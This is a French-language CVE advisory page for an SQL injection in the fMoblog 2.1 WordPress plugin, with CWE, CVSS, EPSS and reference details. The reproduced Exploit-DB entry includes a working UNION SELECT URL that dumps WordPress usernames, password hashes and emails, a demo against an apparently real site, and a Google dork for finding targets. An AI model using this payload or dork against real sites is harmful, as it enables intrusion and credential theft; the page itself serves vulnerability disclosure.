CVE-2009-0968 : Détail

CVE-2009-0968

SQL Injection
A03-Injection
0.23%V3
Network
2009-03-19
09h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

SQL injection vulnerability in fmoblog.php in the fMoblog plugin 2.1 for WordPress allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php. NOTE: some of these details are obtained from third party information.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 8229

Date de publication : 2009-03-16 23h00 +00:00
Auteur : strange kevin
EDB Vérifié : Yes

############################################################# # Wordpress Plugin fMoblog Remote SQL Injection Vulnerability # Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/ # Plugin Version: 2.1 # Author: strange kevin # Email: strange.kevin@gmail.com # Google Dork: "Gallery powered by fMoblog" ############################################################## # Exploit: http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users-- # Demo: http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users-- ############################################################## # Greetz: str0ke and milw0rm.com ############################################################## # milw0rm.com [2009-03-17]

Products Mentioned

Configuraton 0

Fahlstad>>Fmoblog_plugin >> Version 2.1

    Wordpress>>Wordpress >> Version *

    Références

    http://osvdb.org/52836
    Tags : vdb-entry, x_refsource_OSVDB
    https://www.exploit-db.com/exploits/8229
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.vupen.com/english/advisories/2009/0752
    Tags : vdb-entry, x_refsource_VUPEN
    http://secunia.com/advisories/34341
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/bid/34147
    Tags : vdb-entry, x_refsource_BID